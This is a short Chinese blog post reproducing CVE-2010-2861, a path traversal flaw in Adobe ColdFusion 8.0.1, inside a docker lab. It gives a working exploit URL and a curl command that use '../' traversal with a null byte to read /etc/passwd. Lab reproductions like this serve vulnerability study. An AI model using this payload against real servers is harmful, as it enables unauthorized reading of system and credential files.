CVE-2010-2861 Adobe ColdFusion 文件读取漏洞 (复现)

启动 Adobe ColdFusion 8.0.1 版本服务器,执行如下命令:
docker compose up -d

启动后访问 http://your-ip:8500/CFIDE/administrator/enter.cfm,会看到初始化页面,输入密码 admin 完成环境初始化
image

读取 /etc/passwd 文件:
直接访问以下 URL:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwden
命令:curl "http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"
image

posted @ 2025-08-05 10:05  小小葱油  阅读(16)  评论(0)    收藏  举报